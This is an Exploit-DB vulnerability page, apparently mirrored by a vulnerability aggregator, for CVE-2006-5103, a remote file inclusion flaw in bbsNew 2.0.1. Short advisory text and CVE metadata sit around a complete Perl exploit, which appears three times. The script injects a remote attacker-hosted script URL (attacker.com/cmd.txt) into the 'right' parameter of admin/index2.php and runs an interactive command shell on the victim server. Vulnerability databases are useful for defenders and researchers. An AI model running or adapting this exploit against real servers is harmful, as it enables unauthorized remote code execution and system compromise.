Search...

BBSNew 2.0.1 Index2.PHP Remote File Include Vulnerability

2006-09-25T00:00:00

ID EDB-ID:28672
Type exploitdb
Reporter Root3r_H3ll
Modified 2006-09-25T00:00:00

Description

BBSNew 2.0.1 Index2.PHP Remote File Include Vulnerability. CVE-2006-5103. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20204/info

bbsNew is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

#!/usr/bin/perl

#################################################################
#                                                               #
#            bbsNew                                             #
#                                                               #
# Class:     Remote File Include Vulnerability                  #
#                                                               #
# Discovered By :     Root3r_H3LL = |)\0073|)\_|-|311           #
#                                                               #
# Original Advisory : http://Www.PersainFox.coM                 #
#                                                               #
# Remote:    Yes                                                #
#                                                               #
# Type:      high                                               #
#                                                               #
#                                                               #
#################################################################


use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt";   # &lt;====== Change This Line With Your Personal Script

print "\n";
print "#################################################################\n";
print "#                                                               #\n";
print "#   bbsNew =&gt;  2.0.1     Remote File Include Vulnerability      #\n";
print "#            Bug found By : PerSianFox Security                 #\n";
print "#        Email: Root3r_H3LL    Root3r_ir[at]yahoo.com           #\n";
print "#               Web Site : Www.PerSianFox.coM                   #\n";
print "#                We ArE :Root3r_H3LL,Arashrj                    #\n";
print "#                                                               #\n";
print "#                                                               #\n";
print "#                 &lt;/\/\\/_ 10\/3 15 1|)\4/\/                    #\n";
print "#                                                               #\n";
print "#################################################################\n";


if (@ARGV &lt; 2)
{
    print "\n Usage: Root3r.pl [host] [path] ";
    print "\n EX : Root3r.pl www.victim.com /[path]/  \n\n";
exit;
}


$host=$ARGV[0];
$path=$ARGV[1];

print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";

print "&lt;Shell&gt; ";$cmd = &lt;STDIN&gt;;

while($cmd !~ "END") {
    $socket = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$host", PeerPort=&gt;"80") or die "Could not connect to host.\n\n";

    print $socket "GET ".$path."/admin/index2.php?right=".$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = &lt;$socket&gt;)
    {
        print $raspuns;
    }

    print "&lt;Shell&gt; ";
    $cmd = &lt;STDIN&gt;;
}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:28672", "hash": "e522f65f8db750eca6ab4438ca9d29b7", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BBSNew 2.0.1 Index2.PHP Remote File Include Vulnerability", "description": "BBSNew 2.0.1 Index2.PHP Remote File Include Vulnerability. CVE-2006-5103. Webapps exploit for php platform", "published": "2006-09-25T00:00:00", "modified": "2006-09-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28672/", "reporter": "Root3r_H3ll", "references": [], "cvelist": ["CVE-2006-5103"], "lastseen": "2016-02-03T08:40:33", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2016-02-03T08:40:33"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5103"]}, {"type": "seebug", "idList": ["SSV:346"]}, {"type": "osvdb", "idList": ["OSVDB:30892"]}], "modified": "2016-02-03T08:40:33"}, "vulnersScore": 7.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/28672/", "sourceData": "source: http://www.securityfocus.com/bid/20204/info\r\n\r\nbbsNew is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nA successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.\r\n\r\n#!/usr/bin/perl\r\n\r\n#################################################################\r\n# #\r\n# bbsNew #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Discovered By : Root3r_H3LL = |)\\0073|)\\_|-|311 #\r\n# #\r\n# Original Advisory : http://Www.PersainFox.coM #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n# #\r\n#################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"#################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# bbsNew => 2.0.1 Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : PerSianFox Security #\\n\";\r\nprint \"# Email: Root3r_H3LL Root3r_ir[at]yahoo.com #\\n\";\r\nprint \"# Web Site : Www.PerSianFox.coM #\\n\";\r\nprint \"# We ArE :Root3r_H3LL,Arashrj #\\n\";\r\nprint \"# #\\n\";\r\nprint \"# #\\n\";\r\nprint \"# </\\/\\\\/_ 10\\/3 15 1|)\\4/\\/ #\\n\";\r\nprint \"# #\\n\";\r\nprint \"#################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Root3r.pl [host] [path] \";\r\n print \"\\n EX : Root3r.pl www.victim.com /[path]/ \\n\\n\";\r\nexit;\r\n}\r\n\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.\"/admin/index2.php?right=\".$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}", "osvdbidlist": ["30892"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:34", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in admin/index2.php in bbsNew 2.0.1 allows remote attackers to execute arbitrary PHP code via a URL in the \"right\" parameter.", "modified": "2018-10-17T21:41:00", "id": "CVE-2006-5103", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5103", "published": "2006-10-03T04:03:00", "title": "CVE-2006-5103", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T22:22:41", "bulletinFamily": "exploit", "description": "CVE-2006-5103\r\n\r\nBBSNew Index2.PHP Remote File Include Vulnerability\r\n\r\n\u6210\u529f\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u8ba9\u653b\u51fb\u8005\u6267\u884c\u4efb\u610f\u670d\u52a1\u5668\u7aef\u811a\u672c\u4ee3\u7801\u8fdb\u884c\u7535\u8111\u4e0e\u7279\u6743\u7684\u5f71\u54cdWeb\u670d\u52a1\u8fdb\u7a0b.\u8fd9\u53ef\u80fd\u6709\u52a9\u4e8e\u64c5\u81ea\u8fdb\u5165.\n\nbbsNew 2.0.1 \n\u6682\u65e0", "modified": "2006-10-31T00:00:00", "published": "2006-10-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-346", "id": "SSV:346", "title": "BBSNew Index2.PHP Remote File Include Vulnerability", "type": "seebug", "sourceData": "\n #!/usr/bin/perl\r\n\r\n#################################################################\r\n# #\r\n# bbsNew #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Discovered By : Root3r_H3LL = |)\\0073|)\\_|-|311 #\r\n# #\r\n# Original Advisory : http://Www.PersainFox.coM #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n# #\r\n#################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script\r\n\r\nprint "\\n";\r\nprint "#################################################################\\n";\r\nprint "# #\\n";\r\nprint "# bbsNew => 2.0.1 Remote File Include Vulnerability #\\n";\r\nprint "# Bug found By : PerSianFox Security #\\n";\r\nprint "# Email: Root3r_H3LL Root3r_ir[at]yahoo.com #\\n";\r\nprint "# Web Site : Www.PerSianFox.coM #\\n";\r\nprint "# We ArE :Root3r_H3LL,Arashrj #\\n";\r\nprint "# #\\n";\r\nprint "# #\\n";\r\nprint "# </\\/\\\\/_ 10\\/3 15 1|)\\4/\\/ #\\n";\r\nprint "# #\\n";\r\nprint "#################################################################\\n";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print "\\n Usage: Root3r.pl [host] [path] ";\r\n print "\\n EX : Root3r.pl www.victim.com /[path]/ \\n\\n";\r\nexit;\r\n}\r\n\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n\r\nprint "Type Your Commands ( uname -a )\\n";\r\nprint "For Exiit Type END\\n";\r\n\r\nprint "<Shell> ";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ "END") {\r\n $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\\n\\n";\r\n\r\n print $socket "GET ".$path."/admin/index2.php?right=".$cmdshell."?cmd=".$cmd."? HTTP/1.1\\r\\n";\r\n print $socket "Host: ".$host."\\r\\n";\r\n print $socket "Accept: */*\\r\\n";\r\n print $socket "Connection: close\\r\\n\\n";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print "<Shell> ";\r\n $cmd = <STDIN>;\r\n}\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-346"}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0244.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0474.html\nISS X-Force ID: 29580\n[CVE-2006-5103](https://vulners.com/cve/CVE-2006-5103)\nBugtraq ID: 20204\n", "modified": "2006-10-15T18:25:57", "published": "2006-10-15T18:25:57", "href": "https://vulners.com/osvdb/OSVDB:30892", "id": "OSVDB:30892", "title": "bbsNew admin/index2.php right Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}